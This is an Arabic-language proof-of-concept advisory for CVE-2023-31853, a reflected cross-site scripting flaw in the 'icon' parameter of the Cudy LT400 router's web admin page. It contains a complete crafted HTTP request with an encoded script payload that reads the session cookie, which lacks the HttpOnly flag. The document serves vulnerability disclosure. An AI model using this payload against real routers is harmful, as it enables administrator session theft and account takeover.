
استغلال إثبات المفهوم لـ XSS المنعكسة في واجهة إدارة الويب لجهاز Cudy LT400، مما يتيح سرقة رمز الجلسة عبر نقطة النهاية /cgi-bin/luci/admin/network/bandwidth.
يوجد هجوم نص برمجي عبر المواقع (XSS) منعكس في واجهة الإدارة المستندة إلى الويب لجهاز Cudy LT400.
الصفحة /cgi-bin/luci/admin/network/bandwidth بها ثغرة XSS منعكسة عبر المعامل icon.
تتضمن طرق الاستغلال إرسال طلب مُصمم خصيصًا للضحية يتضمن كودًا خبيثًا.
التطبيق المتأثر لا يضع Session Cookie مع خاصية HttpOnly؛ مما قد يؤدي إلى الاستيلاء على حساب المسؤول عبر سرقة رمز الجلسة.
GET /cgi-bin/luci/admin/network/bandwidth?iface=4g&icon=icon-4g%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&i18name=Cellular HTTP/1.1
Host: 172.16.1.1
User-Agent: Mozilla/5.0
Accept: text/html, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://172.16.1.1/cgi-bin/luci/
Cookie: sysauth=REDACTED
Shenzhen Cudy Technology
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31853